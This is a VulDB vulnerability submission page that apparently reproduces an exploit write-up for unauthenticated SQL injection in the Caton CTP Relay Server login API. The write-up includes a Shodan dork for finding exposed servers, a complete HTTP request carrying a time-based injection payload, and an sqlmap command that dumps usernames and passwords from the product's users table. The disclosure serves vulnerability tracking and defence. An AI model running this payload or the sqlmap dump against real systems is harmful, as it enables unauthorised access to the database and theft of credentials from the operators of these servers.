제출 #116765: Caton CTP Relay Server unknown version - SQL Injection Unauthenticated정보

제목	Caton CTP Relay Server unknown version - SQL Injection Unauthenticated
설명	# Exploit Title: Caton CTP Relay Server unknown version - SQL Injection Unauthenticated # Date: 2023-04-21 # Exploit Author: MrEmpy # Version: unknown # Shodan Dork: http.favicon.hash:-940032039 title:"Caton CTP Relay Server" Title: ================ Caton CTP Relay Server unknown version - SQL Injection Unauthenticated Summary: ================ A SQL Injection vulnerability without authentication has been found in the Caton CTP Relay Server product, in an unknown version. This vulnerability allows an attacker to execute malicious SQL commands against the system's underlying database, which could result in unauthorized disclosure of sensitive information such as user credentials, payment details, and other sensitive data. The vulnerability was found on the system's login page, at the "/server/api/v1/login" endpoint, where users send their access credentials to log in to the system. The vulnerable parameters are "username" and "password", which are sent via a JSON via POST. By exploiting this vulnerability, an attacker could insert malicious SQL commands into the "username" and "password" parameters, which will be executed without proper validation. This could allow the attacker to execute malicious commands against the system's database, such as retrieving confidential information or manipulating data. It is important to note that this vulnerability does not require user authentication, which means that anyone could exploit it without needing to have valid system credentials. Severity Level: ================ 7.5 (High) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Affected Product: ================ Caton CTP Relay Server unknown version Proof of Concept: ================ Request: POST /server/api/v1/login HTTP/1.1 Host: target Content-Length: 117 Accept: application/json, text/plain, / Accept-Language: en X-Access-Token: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Content-Type: application/json Origin: http://target Referer: http://target/login Accept-Encoding: gzip, deflate Connection: close {"username":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR","password":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR"} SQLMap command: sqlmap -u 'http://target/server/api/v1/login' --data='{"username":"3xpl","password":"3xpl"}' -p username --risk 3 --level 5 --batch --random-agent --dbms=MySQL --technique=B --threads=10 -D rrsWeb -T users -C username,password --dump
원천	⚠️ ..
사용자	mrempy (UID 24379)
제출	2023. 04. 21. AM 07:16 (3 연령 ago)
모더레이션	2023. 05. 04. PM 05:56 (13 days later)
상태	수락
VulDB 항목	228010 [Caton CTP Relay Server 1.2.9 API /server/api/v1/login username/password SQL 주입]
포인트들	17

◂ 이전 개요 다음 ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!